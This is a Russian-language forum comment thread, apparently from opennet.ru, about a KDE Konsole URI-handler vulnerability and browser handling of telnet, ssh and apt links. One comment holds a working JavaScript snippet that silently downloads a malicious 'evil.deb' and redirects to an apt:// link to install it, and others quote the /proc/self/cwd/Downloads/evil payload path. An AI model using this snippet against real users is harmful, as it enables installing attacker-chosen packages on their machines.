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|1.2, Аноним (2), 23:19, 15/06/2025 [ответить] [﹢﹢﹢] [ · · · ]
|+5 +/–
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У меня больше вопрос в другом. Зачем это вообще в браузере? Кто и на... запускает telnet и ssh через браузер?
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|2.4, Аноним (4), 23:37, 15/06/2025 [^] [^^] [^^^] [ответить]
|+/–
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Ты лучше спроси зачем в браузере URL ghelp:// :-) https://opennet.ru/63035-gnome
Хороши, что KDE, что GNOME, что дистрибутивы, регистрирующие кучу MIME-типов.
PS. В Firefox в about:preferences#general в поле поиска набери Applications, там полно всего, включая irc и apt. Как насчёт провернуть подобную атаку для установки левого пакета через apt?
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|3.6, Аноним (4), 23:45, 15/06/2025 [^] [^^] [^^^] [ответить]
|+3 +/–
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Блин, а оно ведь сработало!
В Ubuntu Firefox и Chrome загружают автоматом deb-пакет, а потом выводят запрос типа "Allow this site to open the apt link with AptURL?"
Скрипт поправил так:
function downloadAndRedirect() {
const anchor = document.createElement('a');
anchor.href = "data:;base64,содержимое deb-пакета в base64";
anchor.download = 'evil.deb';
document.body.appendChild(anchor);
anchor.click();
document.body.removeChild(anchor);
setTimeout(() => {
window.location.href = "apt:///proc/self/cwd/Downloads/evil.deb";
}, 1000);
}
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|3.10, 12yoexpert (ok), 23:52, 15/06/2025 [^] [^^] [^^^] [ответить]
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> Ты лучше спроси зачем в браузере URL ghelp://
зачем тебе в браузере URL ghelp://?
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|2.7, jj (?), 23:45, 15/06/2025 [^] [^^] [^^^] [ответить]
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Давным давно запускал, очень удобно когда у тебя счет железок на тысячи, или по вашему хранить ip надо в txt или exel.
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|2.8, oficsu (ok), 23:47, 15/06/2025 [^] [^^] [^^^] [ответить]
|+1 +/–
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Это всё стандартные uri-хендлеры, которые могут открываться не только из браузера. Лучшее, что нармальный браузер может сделать (и делает, естественно) — это спросить, хочет ли пользователь запускать соответствующий хендлер. Будь это tel://, magnet:// или ssh:// — это дело пользователя, что он хочет открывать, а не браузера
А ssh://, очевидно, является полезным обработчиком. Например, можно хотеть логиниться на сервер из менеджера паролей в один клик. И не важно, выступает ли этимм менеджером KeePassXC, какой-то вебапп на электроне или вообще корпоративная страничка в браузере с полным списком серверов и паролей. Пользователю нужно открыть ssh-доступ из приложения — он соглашется
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|3.16, Аноним (16), 04:13, 16/06/2025 [^] [^^] [^^^] [ответить]
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Да зачем вообще нужны программы, пусть уже всё браузер делает. Браузера хватит всем...
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|1.3, 12yoexpert (ok), 23:32, 15/06/2025 [ответить] [﹢﹢﹢] [ · · · ]
|–4 +/–
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ну а что вы хотели от тимы, в которую вместо инженеров набрали эффективненьких самопиарщиков типа нэта грема
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|2.17, Аноним (17), 04:26, 16/06/2025 [^] [^^] [^^^] [ответить]
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это не самопиар, а самообман - сообщество™ разработчиков кде по определению не может обеспечить качество на уровне корпоративного продукта
единственная надежда у поклонников проекта кде заключается в том, что Габен и ко. возьмут кодовую базу этой СРС под свой контроль, то есть под контроль программистов на зарплате
но зачем ждать, когда уже сейчас можно просто пользоваться GNOME? (:
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|3.33, МИСАКА (?), 05:27, 16/06/2025 [^] [^^] [^^^] [ответить]
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Сейчас бы пользоваться поделием, которое считает юзера за идиота и не может решить, хочет оно пародировать макось или иось
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|1.5, oficsu (ok), 23:40, 15/06/2025 [ответить] [﹢﹢﹢] [ · · · ]
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> в Konsole запускался "/bin/bash /proc/self/cwd/Downloads/evil"
Который непременно должен откуда-то лежать у пользователя, быть баш-скриптом и непременно должен реализовывать желаемое злоумышленником поведение по умолчанию (без параметров, ибо их туда передать нельзя)?
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|2.9, Аноним (4), 23:49, 15/06/2025 [^] [^^] [^^^] [ответить]
|+5 +/–
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/proc/self/cwd/Downloads/evil ссылается на файл, который браузер автоматически без согласия пользователя может загрузить, в том и проблема, что по дефолту Firefox и Chrome без спроса грузят и во всплывающем уведомлении показывают, что загрузили.
Раньше нужно было, чтобы пользователь хотя бы кликул на ссылку для начала загрузки, а сейчас из JavaScript достаточно вызвать метод click();
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|3.12, Аноним (12), 00:17, 16/06/2025 [^] [^^] [^^^] [ответить]
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Справедливости ради, при открытии такой ссылки браузер предупреждает пользователя. Проверил сейчас на хромом и лисе.
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|1.13, Аноним (13), 00:29, 16/06/2025 [ответить] [﹢﹢﹢] [ · · · ]
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>В Firefox и Chrome при попытке перехода по ссылке "telnet://" по умолчанию будет выведен запрос для подтверждения операции у пользователя
И где уязвимость?
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|2.15, oficsu (ok), 03:17, 16/06/2025 [^] [^^] [^^^] [ответить]
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В том месте, где браузером спрашивается подтверждение запуска telnet-обработчика, а Konsole вместо него запускает произвольный код
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|1.14, Аноним (14), 00:31, 16/06/2025 [ответить] [﹢﹢﹢] [ · · · ]
|+1 +/–
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> удалить файл /usr/share/applications/ktelnetservice6.desktop
Если у вас подкроватный сервер, который перезагружается раз в год, то не забудьте что-то вроде:
$ sudo update-desktop-database
чтобы перестроить кеш обработчиков MIME типов
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